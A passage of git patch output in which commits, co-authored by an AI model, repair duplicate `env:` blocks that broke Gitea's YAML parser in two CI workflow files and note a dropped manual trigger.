"Orphan-tunnel sweep: deleted=$count failed=$failed_n" + else + echo "::warning::orphan-tunnels cleanup returned HTTP $http_code — body: $body" + fi + + - name: Dry-run summary + if: env.DRY_RUN == 'true' + run: | + echo "DRY RUN — would have deleted ${{ steps.identify.outputs.count }} org(s) AND triggered orphan-tunnels cleanup. Re-run with dry_run=false to actually delete." From 94ae3bc08249e8cb880226fb4fcdd1767e15c396 Mon Sep 17 00:00:00 2001 From: dev-lead Date: Sun, 10 May 2026 21:29:33 -0700 Subject: [PATCH 6/7] ci(C-3): fix YAML parser-rejection in publish-canvas-image.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Mechanical porter inserted a duplicate `env:` block in .gitea/workflows/publish-canvas-image.yml — the file already had `env: { IMAGE_NAME: ghcr.io/molecule-ai/canvas }` so the second `env: { GITHUB_SERVER_URL: ... }` block triggered Gitea's parser error "yaml: mapping key 'env' already defined". Merged the two blocks into one. Also clarified the dropped workflow_dispatch comment that the porter left dangling above `permissions:`. 
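As a guard against this whole class of porter mistakes, a pre-push
check can flag duplicate mapping keys before Gitea's parser does.
Sketch only, assuming yamllint is available on the operator host (it
is not part of this repo's tooling):

    # fails on e.g. two top-level `env:` blocks in one workflow file
    yamllint -d '{rules: {key-duplicates: enable}}' .gitea/workflows/*.yml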
Verified via fresh `docker logs molecule-gitea-1 --since 5m` after push — no new parser-rejection warnings for publish-canvas-image.yml. Co-Authored-By: Claude Opus 4.7 (1M context) --- .gitea/workflows/publish-canvas-image.yml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/.gitea/workflows/publish-canvas-image.yml b/.gitea/workflows/publish-canvas-image.yml index f9d61214..a044b678 100644 --- a/.gitea/workflows/publish-canvas-image.yml +++ b/.gitea/workflows/publish-canvas-image.yml @@ -36,16 +36,19 @@ on: # platform-only / docs-only / MCP-only merges. - 'canvas/**' - '.gitea/workflows/publish-canvas-image.yml' - # Manual trigger: use after a non-canvas merge that still needs a fresh - # image (e.g. a Dockerfile change lives outside the canvas/ tree). + # NOTE (Gitea port): the original GitHub workflow had a + # `workflow_dispatch:` manual trigger for the + # non-canvas-merge-but-need-fresh-image scenario. Dropped in the + # Gitea port (1.22.6 parser-finicky). Manual rebuilds require + # pushing an empty commit to canvas/ or running the operator-host + # build directly. + permissions: contents: read packages: write # required to push to ghcr.io/${{ github.repository_owner }}/* env: IMAGE_NAME: ghcr.io/molecule-ai/canvas - -env: GITHUB_SERVER_URL: https://git.moleculesai.app jobs: From e434a3c46626ce174de402175c1414d46d8aa19c Mon Sep 17 00:00:00 2001 From: dev-lead Date: Sun, 10 May 2026 21:30:29 -0700 Subject: [PATCH 7/7] ci(C-2): fix YAML parser-rejection in canary-verify.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Mechanical porter inserted a duplicate `env:` block in .gitea/workflows/canary-verify.yml — the file already had an `env: { IMAGE_NAME, TENANT_IMAGE_NAME, CP_URL }` block so the second `env: { GITHUB_SERVER_URL: ... }` block triggered Gitea's parser error "yaml: mapping key 'env' already defined". Merged GITHUB_SERVER_URL into the existing env block. Verified via fresh `docker logs molecule-gitea-1 --since 5m` after push — no new parser-rejection warnings for canary-verify.yml. Co-Authored-By: Claude Opus 4.7 (1M context) --- .gitea/workflows/canary-verify.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/.gitea/workflows/canary-verify.yml b/.gitea/workflows/canary-verify.yml index d11cc7c5..acfe3cbd 100644 --- a/.gitea/workflows/canary-verify.yml +++ b/.gitea/workflows/canary-verify.yml @@ -62,8 +62,6 @@ env: TENANT_IMAGE_NAME: 153263036946.dkr.ecr.us-east-2.amazonaws.com/molecule-ai/platform-tenant # CP endpoint for redeploy-fleet (used in promote step below). CP_URL: ${{ vars.CP_URL || 'https://staging-api.moleculesai.app' }} - -env: GITHUB_SERVER_URL: https://git.moleculesai.app jobs: